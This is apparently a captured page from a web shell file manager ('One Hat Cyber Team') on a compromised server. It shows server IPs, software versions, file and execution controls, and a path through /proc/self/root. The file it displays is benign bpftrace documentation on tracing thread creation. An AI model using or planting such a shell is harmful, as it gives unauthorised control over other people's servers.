⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.144
Server IP:
157.245.143.252
Server:
Linux www 6.11.0-9-generic #9-Ubuntu SMP PREEMPT_DYNAMIC Mon Oct 14 13:19:59 UTC 2024 x86_64
Server Software:
nginx/1.26.0
PHP Version:
8.3.11
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
proc
/
self
/
root
/
usr
/
share
/
doc
/
bpftrace
/
examples
/
View File Name :
threadsnoop_example.txt
Demonstrations of threadsnoop, the Linux bpftrace/eBPF version. Tracing new threads via phtread_create(): # ./threadsnoop.bt Attaching 2 probes... TIME PID COMM FUNC 10:20:31.938572 28549 dockerd threadentry 10:20:31.939213 28549 dockerd threadentry 10:20:31.939405 28549 dockerd threadentry 10:20:31.940642 28549 dockerd threadentry 10:20:31.949060 28549 dockerd threadentry 10:20:31.958319 28549 dockerd threadentry 10:20:31.939152 28549 dockerd threadentry 10:20:31.950978 28549 dockerd threadentry 10:20:32.013269 28579 docker-containe 0x562f30f2e710 10:20:32.036764 28549 dockerd threadentry 10:20:32.083780 28579 docker-containe 0x562f30f2e710 10:20:32.116738 629 systemd-journal 0x7fb7114955c0 10:20:32.116844 629 systemd-journal 0x7fb7114955c0 [...] The output shows a dockerd process creating several threads with the start routine threadentry(), and docker-containe (truncated) and systemd-journal also starting threads: in their cases, the function had no symbol information available, so their addresses are printed in hex.